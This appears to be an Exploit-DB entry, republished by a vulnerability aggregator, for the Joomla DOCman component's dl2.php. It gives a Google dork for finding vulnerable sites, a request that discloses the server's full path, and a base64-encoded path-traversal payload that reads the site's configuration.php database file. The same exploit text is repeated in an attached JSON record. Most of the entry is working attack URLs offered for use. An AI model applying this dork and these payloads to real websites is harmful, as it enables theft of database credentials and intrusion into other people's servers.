Search...

Joomla DOCman Component - Multiple Vulnerabilities

2015-07-15T00:00:00

ID EDB-ID:37620
Type exploitdb
Reporter Hugo Santiago
Modified 2015-07-15T00:00:00

Description

Joomla DOCman Component - Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            # Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):

 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 
 ../../../../../../../target/www/configuration.php &lt;= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  &lt;= Ready !
 

And Now we have a configuration file...

JSON Vulners Source

Initial Source

{"id": "EDB-ID:37620", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Joomla DOCman Component - Multiple Vulnerabilities", "description": "Joomla DOCman Component - Multiple Vulnerabilities. Webapps exploit for php platform", "published": "2015-07-15T00:00:00", "modified": "2015-07-15T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/37620/", "reporter": "Hugo Santiago", "references": [], "cvelist": [], "lastseen": "2016-02-04T06:13:31", "viewCount": 4, "enchantments": {"score": {"value": 0.0, "vector": "NONE", "modified": "2016-02-04T06:13:31", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T06:13:31", "rev": 2}, "vulnersScore": 0.0}, "sourceHref": "https://www.exploit-db.com/download/37620/", "sourceData": "# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)\r\n# CWE: CWE-200(FPD) CWE-98(LFI/LFD)\r\n# Risk: High\r\n# Author: Hugo Santiago dos Santos\r\n# Contact: hugo.s@linuxmail.org\r\n# Date: 13/07/2015\r\n# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman\r\n# Google Dork: inurl:\"/components/com_docman/dl2.php\"\r\n\r\n# Xploit (FPD): \r\n \r\n Get one target and just download with blank parameter: \r\n http://www.site.com/components/com_docman/dl2.php?archive=0&file=\r\n \r\n In title will occur Full Path Disclosure of server.\r\n \r\n# Xploit (LFD/LFI):\r\n\r\n http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]\r\n \r\n Let's Xploit...\r\n \r\n First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:\r\n \r\n ../../../../../../../target/www/configuration.php <= Not Ready\r\n \r\n http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA== <= Ready !\r\n \r\n\r\nAnd Now we have a configuration file...", "osvdbidlist": ["124757", "124758"], "immutableFields": []}